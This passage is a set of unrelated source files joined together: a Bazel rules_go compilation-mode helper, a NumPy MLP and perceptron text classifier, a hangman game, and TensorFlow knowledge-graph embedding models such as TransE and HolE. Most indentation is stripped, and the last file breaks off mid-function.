# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modes are documented in go/modes.rst#compilation-modes
LINKMODE_NORMAL = "normal"
LINKMODE_SHARED = "shared"
LINKMODE_PIE = "pie"
LINKMODE_PLUGIN = "plugin"
def mode_string(mode):
result = [mode.goos, mode.goarch]
if mode.static:
result.append("static")
if mode.race:
result.append("race")
if mode.msan:
result.append("msan")
if mode.pure:
result.append("pure")
if mode.debug:
result.append("debug")
if mode.strip:
result.append("stripped")
if not result or not mode.link == LINKMODE_NORMAL:
result.append(mode.link)
return "_".join(result)
def _ternary(*values):
for v in values:
if v == None: continue
if type(v) == "bool": return v
if type(v) != "string": fail("Invalid value type {}".format(type(v)))
v = v.lower()
if v == "on": return True
if v == "off": return False
if v == "auto": continue
fail("Invalid value {}".format(v))
fail("_ternary failed to produce a final result from {}".format(values))
def get_mode(ctx, toolchain_flags):
if "@io_bazel_rules_go//go:toolchain" in ctx.toolchains:
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:toolchain"]
else:
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:bootstrap_toolchain"]
# We always have to use the pure stdlib in cross compilation mode
force_pure = "on" if go_toolchain.cross_compile else "auto"
#TODO: allow link mode selection
static = _ternary(
getattr(ctx.attr, "static", None),
"static" in ctx.features,
)
race = _ternary(
getattr(ctx.attr, "race", None),
"race" in ctx.features,
)
msan = _ternary(
getattr(ctx.attr, "msan", None),
"msan" in ctx.features,
)
pure = _ternary(
getattr(ctx.attr, "pure", None),
force_pure,
"pure" in ctx.features,
)
    debug = ctx.var["COMPILATION_MODE"] == "dbg"
strip_mode = "sometimes"
if toolchain_flags:
strip_mode = toolchain_flags.strip
strip = True
if strip_mode == "always":
strip = True
elif strip_mode == "sometimes":
strip = not debug
goos = getattr(ctx.attr, "goos", None)
if goos == None or goos == "auto":
goos = go_toolchain.default_goos
elif not pure:
fail("If goos is set, pure must be true")
goarch = getattr(ctx.attr, "goarch", None)
if goarch == None or goarch == "auto":
goarch = go_toolchain.default_goarch
elif not pure:
fail("If goarch is set, pure must be true")
return struct(
static = static,
race = race,
msan = msan,
pure = pure,
link = LINKMODE_NORMAL,
debug = debug,
strip = strip,
goos = goos,
goarch = goarch,
)
|
from __future__ import division
import numpy as np
import argparse
import random
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk import word_tokenize
from nltk.util import ngrams
from nltk.collocations import *
import timeit
import sys
import pickle
import gzip
class Classifier(object):
    def __init__(self):
pass
    def train(self):
"""
Override this method in your class to implement train
"""
raise NotImplementedError("Train method not implemented")
    def inference(self):
"""
Override this method in your class to implement inference
"""
raise NotImplementedError("Inference method not implemented")
    def calculate_accuracy(self):
"""
Override this method in your class to implement inference
"""
raise NotImplementedError("Calculate accuracy method not implemented")
class MLP(Classifier):
"""
Implement your MLP here
"""
def __init__(self, input_length, hidden_layer_size, output_size):
# determine the step ranges
input_range = 1.0 / input_length ** (1/2)
middle_range = 1.0 / hidden_layer_size[0] ** (1/2)
output_range = 1.0 / output_size ** (1/2)
self.hidden_layer_size = hidden_layer_size
# dictionary to keep track of the parameters
self.parameterDictionary = {}
# layers of weights - start random for good initialization
# bias layers - start at 0 for no bias
# create a weight matrix input_length * hidden_size since the input is 1 * input_length
self.parameterDictionary['w1'] = np.random.normal(loc = 0, scale = input_range, size = (input_length, hidden_layer_size[0]))
# bias matrix size is 1 * hidden_size
self.parameterDictionary['b1'] = np.zeros(hidden_layer_size[0])
        self.parameterDictionary['w2'] = np.random.normal(loc=0, scale=middle_range, size=(hidden_layer_size[0], output_size))
self.parameterDictionary['b2'] = np.zeros(output_size)
#super(MLP, self).__init__()
def sigmoid(self, x):
return (1/(1 + np.exp(-x)))
def dersigmoid(self, x):
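        # Note: expects x to already be a sigmoid output, i.e. this returns s * (1 - s).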
return x * (1 - x)
def inference(self, X):
o1 = X.dot(self.parameterDictionary['w1']) + self.parameterDictionary['b1']
# RELU activation function
a1 = np.maximum(0, o1)
# second forward pass
o2 = a1.dot(self.parameterDictionary['w2']) + self.parameterDictionary['b2']
# sigmoid function
a2 = self.sigmoid(o2)
prediction = [1 if i >= 0.5 else 0 for i in a2]
return prediction
def calculate_accuracy(self, validation_x, validation_y):
predictions = self.inference(validation_x)
accuracy = 0
for pred, gold in zip(predictions, validation_y):
if pred == gold:
accuracy = accuracy + 1
accuracy = accuracy / len(validation_x)
return accuracy
# set the model weights
def set_parameters(self, best_parameters):
self.parameterDictionary['w1'] = best_parameters['w1']
self.parameterDictionary['w2'] = best_parameters['w2']
#self.parameterDictionary['b1'] = best_parameters['b1']
#self.parameterDictionary['b2'] = best_parameters['b2']
def train(self, X, Y, validation_x, validation_y, learning_rate, learning_rate_decay, regularization=0.90, batch_size=700, num_epochs=160):
best_test_accuracy = 0.0
best_epoch = 1
# dictionary to store the weights when we get the best test accuracy
best_parameters = {}
# fully connected layers
for i in range(num_epochs):
for j in range(int(len(X) / batch_size)):
# create a mini batch of the data
indices = np.random.choice(np.arange(X.shape[0]), size=batch_size, replace=True)
X_data = X[indices]
Y_data = Y[indices]
# forward pass
# for 2d arrays .dot is equivalent to matrix multiplication
o1 = X_data.dot(self.parameterDictionary['w1']) + self.parameterDictionary['b1']
# RELU activation function
a1 = np.maximum(0, o1)
#a1 *= np.random.binomial([np.ones((len(X_data), self.hidden_layer_size[0]))],1-0.25)[0] * (1.0/(1-0.25))
# second forward pass
o2 = a1.dot(self.parameterDictionary['w2']) + self.parameterDictionary['b2']
a2 = self.sigmoid(o2)
# backpropagation
# hidden units -> compute error term based on weighted average of error terms of nodes that use a_i as an input
# dictionary to keep track of gradients to make it easier
gradients = {}
                # for each node i in layer l, compute an error term measuring how much that node was responsible for the output error
                # for the output node, measure the difference between the network's activation and the true target value
# TODO: Fix
Y_data = np.reshape(Y_data, (len(Y_data), 1))
error3 = -(Y_data - a2)
output_error = error3 * self.dersigmoid(a2)
# error = w.T * error from the above layer * activation
# the output is related to the w2
# update = error of above layer * input of this layer
gradients['w2'] = np.dot(a1.T, output_error)
#gradients['b3'] = np.sum(output_error, axis=0)
# error is weight at this layer * error of previous layer
error = np.dot(output_error, self.parameterDictionary['w2'].T)
# backpropagate through the RELU activation function
error[a1 <= 0] = 0
# a1 is the input into w2
# update = error of above layer * input of this layer
gradients['w1'] = np.dot(X_data.T, error)
#gradients['b2'] = np.sum(error, axis=0)
# update the weights
self.parameterDictionary['w1'] = self.parameterDictionary['w1'] + (-learning_rate * regularization * gradients['w1'])
self.parameterDictionary['w2'] = self.parameterDictionary['w2'] + (-learning_rate * regularization * gradients['w2'])
# update the bias
# self.parameterDictionary['b1'] = self.parameterDictionary['b1'] + (-learning_rate * gradients['b1'])
# self.parameterDictionary['b2'] = self.parameterDictionary['b2'] + (-learning_rate * gradients['b2'])
accuracy = self.calculate_accuracy(validation_x, validation_y)
train_accuracy = self.calculate_accuracy(X, Y)
# decay the learning rate
learning_rate *= learning_rate_decay
if accuracy > best_test_accuracy:
best_test_accuracy = accuracy
best_parameters['w1'] = self.parameterDictionary['w1']
best_parameters['w2'] = self.parameterDictionary['w2']
#best_parameters['b1'] = self.parameterDictionary['b1']
#best_parameters['b2'] = self.parameterDictionary['b2']
best_epoch = i
print("Train Accuracy at epoch " + str(i) + ": " + str(train_accuracy))
print("Test Accuracy at epoch " + str(i) + ": " + str(accuracy))
print("Best validation accuracy: " + str(best_test_accuracy))
print("Best epoch: " + str(best_epoch))
#with open('best_parameters_dictionary.pickle', 'wb') as handle:
with gzip.open('best_parameters_dictionary.gzip', 'wb') as f:
pickle.dump(best_parameters, f)
#pickle.dump(best_parameters, handle, protocol=pickle.HIGHEST_PROTOCOL)
class Perceptron(Classifier):
"""
Implement your Perceptron here
"""
def __init__(self, input_length):
#super(Perceptron, self).__init__()
# perceptron only has one layer so only one weight vector needed
#self.weights = np.random.randn(input_length)
self.weights = np.zeros(input_length)
def inference(self, x_data):
prediction_list = []
for i in range(len(x_data)):
output = x_data[i].dot(self.weights)
# make a prediction (1 if output > 0, else 0)
# prediction = [1 if i > 0 else 0 for i in output]
prediction = np.sign(output)
if prediction == -1:
prediction = 0
prediction_list.append(prediction)
return prediction_list
def calculate_accuracy(self, validation_x, validation_y):
predictions = self.inference(validation_x)
accuracy = 0
for pred, gold in zip(predictions, validation_y):
if pred == gold:
accuracy = accuracy + 1
accuracy = accuracy / len(validation_x)
return accuracy
def train(self, X, Y, validation_x, validation_y, learning_rate, num_epochs=50):
# calculate the output (w * x)
#output = x_data.dot(self.weights) + self.bias
# make a prediction (1 if output > 0, else -1)
# calculate the error
# update the weights based on the learning rate and error
# keep track of best accuracy to avoid overfitting
best_accuracy = 0
previous_best_accuracy = 0
third_prev_best_accuracy = 0
for j in range(num_epochs):
for i in range(0, len(X)):
# if y' != y
multiple = 0
if Y[i] == 0:
multiple = -1
else:
multiple = 1
if (np.dot(X[i], self.weights)*multiple) <= 0:
self.weights = self.weights + learning_rate*multiple*X[i]
# use the validation set to control overfitting.
# stop training if we start to overfit the train set.
current_accuracy = self.calculate_accuracy(validation_x, validation_y)
if best_accuracy == previous_best_accuracy == third_prev_best_accuracy == current_accuracy:
print("Best accuracy: " + str(best_accuracy) + " current accuracy: " + str(current_accuracy))
print("Stopped training at epoch: " + str(j))
break
else:
third_prev_best_accuracy = previous_best_accuracy
previous_best_accuracy = best_accuracy
best_accuracy = current_accuracy
def feature_extractor_test_data(data, labels, all_words):
data_array = np.zeros((len(data), len(all_words)))
all_words = list(all_words)
for index, row in enumerate(data):
tokens = [word.lower() for word in row.split()]
#words_no_stopwords = [word for word in tokens if not word in stopwordsSet]
for i, word in enumerate(tokens):
try:
word_index = all_words.index(word)
data_array[index, word_index] = 1
            except ValueError:
continue
x_data_array = np.asarray(data_array)
return x_data_array, np.array(labels)
#return bigram_data_array, np.array(labels)
def feature_extractor_training_data(data, labels):
"""
implement your feature extractor here
"""
# stopwords from NLTK
stopwordsSet = set(stopwords.words("english"))
# unique words set without stopwords
unique_words = set()
all_words = []
for row in data:
words = row.split()
for i in words:
if i.lower() not in unique_words and i.lower() not in stopwordsSet:
unique_words.add(i.lower())
all_words.append(i.lower())
data_array = np.zeros((len(data), len(all_words)))
for index, row in enumerate(data):
tokens = [word.lower() for word in row.split()]
#words_no_stopwords = [word for word in tokens if not word in stopwordsSet]
for i, word in enumerate(tokens):
try:
word_index = all_words.index(word)
data_array[index, word_index] = 1
            except ValueError:
continue
# the bag of words representation
x_data_array = np.asarray(data_array)
return x_data_array, np.array(labels), all_words
def evaluate(preds, golds):
tp, pp, cp = 0.0, 0.0, 0.0
    # zip -> iterator that aggregates elements from each of the iterables
for pred, gold in zip(preds, golds):
if pred == 1:
pp += 1
if gold == 1:
cp += 1
if pred == 1 and gold == 1:
tp += 1
precision = tp / pp
recall = tp / cp
try:
f1 = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
return (precision, recall, 0.0)
return (precision, recall, f1)
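# Illustrative (added for clarity): evaluate([1, 0, 1], [1, 1, 1]) gives
# precision 1.0, recall 2/3 and f1 0.8.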
def main():
start_time = timeit.default_timer()
argparser = argparse.ArgumentParser()
argparser.add_argument("--best_parameters")
args, leftovers = argparser.parse_known_args()
with open("sentences.txt", encoding='latin-1') as f:
data = f.readlines()
with open("labels.txt", encoding='latin-1') as g:
labels = [int(label) for label in g.read()[:-1].split("\n")]
"""
Cross Validation - Separate data into 60%, 20%, 20% (training, validation, test)
Validation - If accuracy of training data set increases but validation doesn't, then stop training
"""
# return a list of numbers in a random order
data_length = len(data)
indices = np.random.permutation(data_length)
training_index, validation_index, test_index = indices[:int(.6 * data_length)], indices[int(.6 * data_length):int(.8 * data_length)], indices[int(.8 * data_length):]
data = np.asarray(data)
labels = np.asarray(labels)
training_x_data = data[training_index]
training_y_data = labels[training_index]
validation_x_data = data[validation_index]
validation_y_data = labels[validation_index]
test_x_data = data[test_index]
test_y_data = labels[test_index]
"""
Extract features
"""
if args.best_parameters is None:
training_x_data, training_y_data, unique_words = feature_extractor_training_data(training_x_data, training_y_data)
np.save("unique_words.npy", unique_words)
else:
unique_words = np.load("unique_words.npy")
training_x_data, training_y_data = feature_extractor_test_data(training_x_data, training_y_data, unique_words)
validation_x_data, validation_y_data = feature_extractor_test_data(validation_x_data, validation_y_data, unique_words)
test_x_data, test_y_data = feature_extractor_test_data(test_x_data, test_y_data, unique_words)
"""
Initialize the algorithms
"""
data_sample_length = len(training_x_data[0])
myperceptron = Perceptron(data_sample_length)
hidden_layer_size = [12]
output_size = 1
mymlp = MLP(data_sample_length, hidden_layer_size, output_size)
"""
Training
"""
learning_rate = 0.001
#learning_rate_finish = 0.0003
#learning_rate_decay = (learning_rate_finish / learning_rate) ** (1./num_epochs)
learning_rate_decay = 1
num_epochs = 160
if args.best_parameters is None:
mymlp.train(training_x_data, training_y_data, validation_x_data, validation_y_data, learning_rate, learning_rate_decay, num_epochs=num_epochs)
else:
with gzip.open(args.best_parameters, 'rb') as f:
best_parameters_dictionary = pickle.load(f)
mymlp.set_parameters(best_parameters_dictionary)
myperceptron.train(training_x_data, training_y_data, validation_x_data, validation_y_data, 1.0)
"""
Testing on testing data set
"""
#with open("sentences.txt", encoding='latin-1') as f:
# test_x = f.readlines()
#with open("labels.txt", encoding='latin-1') as g:
# test_y = np.asarray([int(label) for label in g.read()[:-1].split("\n")])
predicted_y = mymlp.inference(test_x_data)
precision, recall, f1 = evaluate(predicted_y, test_y_data)
#print "MLP results", precision, recall, f1
accuracy = mymlp.calculate_accuracy(test_x_data, test_y_data)
print("MLP Accuracy: " + str(accuracy))
print("MLP results: " + str(precision) + " " + str(recall) + " " + str(f1))
#test_x, test_y = feature_extractor(data, labels)
predicted_y = myperceptron.inference(test_x_data)
precision, recall, f1 = evaluate(predicted_y, test_y_data)
accuracy = myperceptron.calculate_accuracy(test_x_data, test_y_data)
print("Perceptron Accuracy: " + str(accuracy))
#print "Perceptron results", precision, recall, f1
print("Perceptron results" + " " + str(precision) + " " + str(recall) + " " + str(f1))
elapsed = timeit.default_timer() - start_time
print(elapsed)
"""
Testing on unseen testing data in grading
"""
argparser.add_argument("--test_data", type=str, default="../test_sentences.txt", help="The real testing data in grading")
argparser.add_argument("--test_labels", type=str, default="../test_labels.txt", help="The labels for the real testing data in grading")
parsed_args = argparser.parse_args(sys.argv[1:])
real_test_sentences = parsed_args.test_data
real_test_labels = parsed_args.test_labels
with open(real_test_sentences, encoding='latin-1') as f:
real_test_x = f.readlines()
with open(real_test_labels, encoding='latin-1') as g:
real_test_y = [int(label) for label in g.read()[:-1].split("\n")]
#real_test_y = g.readlines()
real_test_x, real_test_y = feature_extractor_test_data(real_test_x, real_test_y, unique_words)
print(real_test_x.shape)
print(real_test_y.shape)
predicted_y = mymlp.inference(real_test_x)
precision, recall, f1 = evaluate(predicted_y, real_test_y)
print("MLP results: " + str(precision) + " " + str(recall) + " " + str(f1))
#print "MLP results", precision, recall, f1
predicted_y = myperceptron.inference(real_test_x)
precision, recall, f1 = evaluate(predicted_y, real_test_y)
print("Perceptron results" + " " + str(precision) + " " + str(recall) + " " + str(f1))
#print "Perceptron results", precision, recall, f1
if __name__ == '__main__':
main()
|
word = ["python", "java", "kotlin", "javascript"].pop()
display = ["-"] * len(word)
guesses = set()
lives = 8
print("H A N G M A N")
while True:
instruction = input('Type "play" to play the game, "exit" to quit: ')
if instruction == "play":
while lives > 0:
print()
print("".join(display))
letter = input("Input a letter: ")
if len(letter) == 1:
if letter.isascii() and letter.islower():
if letter not in guesses:
guesses.add(letter)
if letter in word:
for i in range(len(word)):
if word[i] == letter:
display[i] = letter
if "-" not in display:
print("You guessed the word!")
print("You survived!")
break
else:
lives -= 1
print("That letter doesn't appear in the word")
if lives == 0:
print("You lost!")
else:
print("You've already guessed this letter")
else:
print("Please enter a lowercase English letter")
else:
print("You should input a single letter")
print()
# The following two lines are only included to pass the test case.
print('Type "play" to play the game, "exit" to quit: ')
break
elif instruction == "exit":
break
|
import collections
import time
import sklearn.feature_extraction
import sklearn.preprocessing
import numpy as np
from scipy import sparse
import tensorflow as tf
def init_nunif(sz, bnd=None):
if bnd is None:
if len(sz) >= 2:
bnd = np.sqrt(6) / np.sqrt(sz[0] + sz[1])
else:
bnd = 1.0 / np.sqrt(sz[0])
return np.random.uniform(low=-bnd, high=bnd, size=sz)
def tf_cconv(a, b):
a_fft = tf.fft(tf.complex(a, 0.0))
b_fft = tf.fft(tf.complex(b, 0.0))
ifft = tf.ifft(a_fft * b_fft)
return tf.cast(tf.real(ifft), 'float32')
def np_cconv(a, b):
a_fft = np.fft.fft(a)
b_fft = np.fft.fft(b)
return np.fft.ifft(a_fft * b_fft).real
def tf_ccorr(a, b):
a_fft = tf.fft(tf.complex(a, 0.0))
b_fft = tf.fft(tf.complex(b, 0.0))
ifft = tf.ifft(tf.conj(a_fft) * b_fft)
return tf.cast(tf.real(ifft), 'float32')
def np_ccorr(a, b):
a_fft = np.fft.fft(a)
b_fft = np.fft.fft(b)
return np.fft.ifft(np.conj(a_fft) * b_fft).real
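# Circular correlation via FFT: ccorr(a, b) = IFFT(conj(FFT(a)) * FFT(b)).real;
# this is the composition operation used by the HolE model below.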
def vec_mat_mul(v, M):
product = tf.matmul(tf.expand_dims(v,-2), M)
return tf.squeeze(product, -2)
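# vec_mat_mul computes a batched vector-matrix product: v is expanded to
# [..., 1, dim], multiplied with M, and squeezed back to [..., dim].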
class BaseModel(object):
def __init__(self, ne, nr, dim, samplef, **kwargs):
self.samplef = samplef
self.ne = ne
self.nr = nr
self.dim = dim
self.pairwise = kwargs.pop("pairwise", True)
self.epochs = kwargs.pop("epochs",200)
self.batch_size = kwargs.pop("batch_size",1024)
self.learning_rate = kwargs.pop("learning_rate",0.01)
self.reg = kwargs.pop("reg",0.0)
self.margin = kwargs.pop("margin",1.0)
        self.param_names = []  # list of parameter names needed for computing the score of a triplet
self.E_shape = [self.ne, self.dim]
self.R_shape = [self.nr, self.dim]
self.reg_loss = tf.constant(0, dtype=tf.float32)
def _on_epoch_begin(self):
self.indices = np.arange(len(self.X))
np.random.shuffle(self.indices)
def _get_batch(self, idx):
indices = self.indices[idx*self.batch_size : (idx+1)*self.batch_size]
pos = self.X[indices]
neg = np.array([self.samplef(fact, self.ne) for fact in pos])
subjs = pos[:,0]
objs = pos[:,2]
preds = pos[:,1]
neg_subjs = neg[:,0]
neg_objs = neg[:,2]
return {self.ps:subjs, self.po:objs, self.ns:neg_subjs, self.no:neg_objs, self.p:preds}
def _add_param(self, name, shape, bnd=None):
init_vals = init_nunif(shape, bnd)
var = tf.Variable(init_vals, dtype=tf.float32, name=name)
setattr(self, name, var)
self.param_names.append(name)
        self._regularize(var)
def create_params(self):
self._add_param("E", self.E_shape)
self._add_param("R", self.R_shape)
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R = tf.gather(self.R, p)
E_o = tf.gather(self.E, o)
return E_s, R, E_o
def gather_np(self, si, pi, oi):
es = self.E[si]
eo = self.E[oi]
r = self.R[pi]
return es, r, eo
def train_score(self, s, p, o):
raise NotImplementedError("train_score should be defined by the inheriting class")
def _regularize(self, var):
if self.reg > 0:
self.reg_loss += tf.nn.l2_loss(var)
def train_loss(self, score_pos, score_neg):
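        # Pairwise: summed margin-ranking loss max(0, margin - s_pos + s_neg);
        # otherwise a logistic (softplus) loss on the positive/negative scores.
        # L2 regularization is added with weight self.reg.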
if self.pairwise:
rank_loss = tf.reduce_sum(tf.maximum(0.0, self.margin - score_pos + score_neg))
else:
# Logistic loss
rank_loss = tf.reduce_sum(tf.nn.softplus(-score_pos) + tf.nn.softplus(score_neg))
return rank_loss + self.reg * self.reg_loss
def fit(self, X, y=None):
'''
        X : list/iterable of (subject, predicate, object) triplets
y : ignored (assumes all examples are positive)
'''
self.X = np.array(X)
self.ps = tf.placeholder(tf.int32, [self.batch_size])
self.p = tf.placeholder(tf.int32, [self.batch_size])
self.po = tf.placeholder(tf.int32, [self.batch_size])
self.ns = tf.placeholder(tf.int32, [self.batch_size])
self.no = tf.placeholder(tf.int32, [self.batch_size])
self.create_params()
score_pos = self.train_score(self.ps, self.p, self.po)
score_neg = self.train_score(self.ns, self.p, self.no)
self.loss = self.train_loss(score_pos, score_neg)
self._optimize()
def _run_epoch(self, optimizer):
start = time.time()
self._on_epoch_begin()
tot_loss = 0
self.cur_epoch += 1
for b in range(len(self.X)//self.batch_size):
feed_dict = self._get_batch(b)
_,l = self.sess.run([optimizer,self.loss], feed_dict=feed_dict)
tot_loss += l
avg_loss = tot_loss / (len(self.X)//self.batch_size * self.batch_size)
t = time.time() - start
print("Epoch: %i/%i; loss = %.9f (%.1f s)" %(self.cur_epoch+1,self.epochs,avg_loss,t), end="\r")
if (self.cur_epoch+1)%10 == 0:
print("")
def _optimize(self):
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Starting training")
for epoch in range(self.epochs):
self._run_epoch(opt1)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
class TransE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
def train_score(self, s, p, o):
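        # TransE score: -||E_s + R - E_o||_1; larger values indicate more plausible triplets.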
E_s, R, E_o = self.gather(s, p, o)
return -tf.reduce_sum(tf.abs(E_s + R - E_o), axis=-1)
def score(self, si, pi, oi):
es, r, eo = TransE.gather_np(self, si, pi, oi)
return -np.sum(np.abs(es + r - eo), axis=-1)
class TransR(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
def create_params(self):
BaseModel.create_params(self)
self._add_param("Mr", [self.nr, self.dim, self.dim])
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R = tf.gather(self.R, p)
Mr = tf.gather(self.Mr, p)
E_o = tf.gather(self.E, o)
return E_s, R, Mr, E_o
def gather_np(self, si, pi, oi):
es, r, eo = BaseModel.gather_np(self, si, pi, oi)
Mr = self.Mr[pi]
return es, r, Mr, eo
def train_score(self, s, p, o):
E_s, R, Mr, E_o = self.gather(s, p, o)
# Mr : [batch_size x dim x dim]
# E_s, E_o : [batch_size x dim]
E_sr = vec_mat_mul(E_s, Mr)
E_or = vec_mat_mul(E_o, Mr)
return -tf.reduce_sum(tf.abs(E_sr + R - E_or), axis=-1)
def score(self, si, pi, oi):
es, r, Mr, eo = TransR.gather_np(self, si, pi, oi)
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class RESCAL(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(vec_mat_mul(E_s, R) * E_o, axis=-1)
def score(self, si, pi, oi):
es, r, eo = RESCAL.gather_np(self, si, pi, oi)
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(R * tf_ccorr(E_s, E_o), axis=-1)
def score(self, si, pi, oi):
es, r, eo = HolE.gather_np(self, si, pi, oi)
return np.sum(r * np_ccorr(es, eo), axis=-1)
class SE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def create_params(self):
BaseModel.create_params(self)
self.param_names.remove("R")
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
E_o = tf.gather(self.E, o)
return E_s, E_o, R1, R2
def gather_np(self, si, pi, oi):
es, r, eo = BaseModel.gather_np(self, si, pi, oi)
R1 = self.R1[pi]
R2 = self.R2[pi]
return es, eo, R1, R2
def train_score(self, s, p, o):
E_s, E_o, R1, R2 = self.gather(s, p, o)
# E_s, E_o : [batch_size x dim]
# R1, R2 : [batch_size x dim x dim]
E_sr = vec_mat_mul(E_s, R1)
E_or = vec_mat_mul(E_o, R2)
return -tf.reduce_sum(tf.abs(E_sr - E_or), axis=-1)
def score(self, si, pi, oi):
es, eo, R1, R2 = SE.gather_np(self, si, pi, oi)
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMult(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(E_s * R * E_o, axis=-1)
def score(self, si, pi, oi):
es, r, eo = DistMult.gather_np(self, si, pi, oi)
return np.sum(es * r * eo, axis=-1)
class BaseWordVectorsModel(BaseModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True, pe=False,
tfidf_weights=False, **kwargs):
'''
word_ids: length ne list/iterable, where word_ids[i] is a list/iterable of indices
of words associated with entity i
word_init: length nw list/iterable, where word_init[i] is a numpy array indicating the
                       initial value to assign to the vector for word i, or None if no initial
                       value is available.
'''
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.word_ids = word_ids
assert len(self.word_ids) == ne
self.nw = max(max(ids) for ids in self.word_ids if len(ids) > 0) + 1
self.word_init = word_init
if self.word_init is not None:
# Make sure embedding dimensionality is the same as that of the word initialization vectors
text_dim = next(len(x) for x in self.word_init if x is not None)
if text_dim != self.dim:
                print("WARNING: Detected dimension %i in word initialization vectors. Overriding dimension setting of %i."
                      %(text_dim, self.dim))
self.dim = text_dim
self.R_shape = [self.nr, self.dim]
self.weighted = weighted
self.pe = pe
self.tfidf_weights = tfidf_weights
self.learning_rate = kwargs.pop("learning_rate",0.1)
def create_params(self):
# Since tensorflow does not support gathering of sparse matrices (needed for gathering a batch),
# we use the following workaround.
# Store the sparse matrix as a list of sparse vectors (note the matrix is constant).
# Leave the sparse matrix A as a sparse placeholder.
# Then to compute the entity embeddings of a batch, gather only the indices and values of A for that
# batch and feed it into the placeholder for A. Then compute E as usual.
# Build word matrix as in BaseModel
nw = self.nw
assert all(max(ids) < self.nw for ids in self.word_ids if len(ids) > 0)
# Assign unique dummy ids to entities with no words
for i in range(self.ne):
if len(self.word_ids[i]) == 0:
self.word_ids[i] = [self.nw]
self.nw += 1
self.nw += sum([len(words) == 0 for words in self.word_ids])
W_init = init_nunif([self.nw, self.dim])
if self.word_init is not None:
for i in range(nw):
if self.word_init[i] is not None:
W_init[i] = self.word_init[i]
self.W = tf.Variable(W_init, dtype=tf.float32, name="W")
self.param_names.append("W")
self._regularize(self.W)
if self.pe:
# Parameter-efficient weighting scheme
self.P = tf.Variable(np.random.uniform(low=-0.1, high=0.1, size=[self.nr,self.dim]), dtype=tf.float32, name="P")
weights = tf.matmul(self.P, tf.transpose(self.W))
self.B = tf.exp(weights)
self.param_names.append("P")
self.phase2_vars = [self.P]
else:
# Setting B constant (untrainable) and uniform is equivalent to unweighted word vectors.
self.B = tf.Variable(np.ones([self.nr,self.nw]), dtype=tf.float32, trainable=self.weighted, name="B")
self.phase2_vars = [self.B]
self.param_names.append("B")
if self.tfidf_weights:
# Extract tf-idf weights
corpus = [" ".join(list(map(str,ids))) for ids in self.word_ids]
vocab = map(str, range(self.nw))
vectorizer = sklearn.feature_extraction.text.TfidfVectorizer(vocabulary=vocab)
self.A = vectorizer.fit_transform(corpus)
self.A = sklearn.preprocessing.normalize(self.A, norm="l1", axis=1)
else:
# Weights are just frequencies of words
# Create sparse matrix as a list of lists of indices and values
values = []
row_ind = []
col_ind = []
no_word_id = nw
for i in range(self.ne):
vals = collections.defaultdict(float)
for j in self.word_ids[i]:
vals[j] += 1.0
for j in vals.keys():
row_ind.append(i)
col_ind.append(j)
values.append(vals[j])
self.A = sparse.csr_matrix((values, (row_ind, col_ind)), shape=[self.ne,self.nw], dtype=np.float32)
self.A = sklearn.preprocessing.normalize(self.A, norm="l1", axis=1)
self._add_param("R", self.R_shape)
def _gather_A(self, idx):
A_batch = sparse.coo_matrix(self.A[idx], dtype=np.float32)
ret = tf.SparseTensorValue(indices=np.array([A_batch.row,A_batch.col]).T, values=A_batch.data,
dense_shape=[self.batch_size,self.nw])
return ret
def _get_batch(self, idx):
# Add sparse tensor values for A matrices to feed dict
feed_dict = BaseModel._get_batch(self, idx)
feed_dict[self.A_ps] = self._gather_A(feed_dict[self.ps])
feed_dict[self.A_po] = self._gather_A(feed_dict[self.po])
feed_dict[self.A_ns] = self._gather_A(feed_dict[self.ns])
feed_dict[self.A_no] = self._gather_A(feed_dict[self.no])
return feed_dict
def gather(self, s, p, o):
B = tf.gather(self.B, p)
s_weights = self.A_s * B
s_weights /= tf.sparse_reduce_sum(s_weights, axis=1, keep_dims=True)
o_weights = self.A_o * B
o_weights /= tf.sparse_reduce_sum(o_weights, axis=1, keep_dims=True)
E_s = tf.sparse_tensor_dense_matmul(s_weights, self.W)
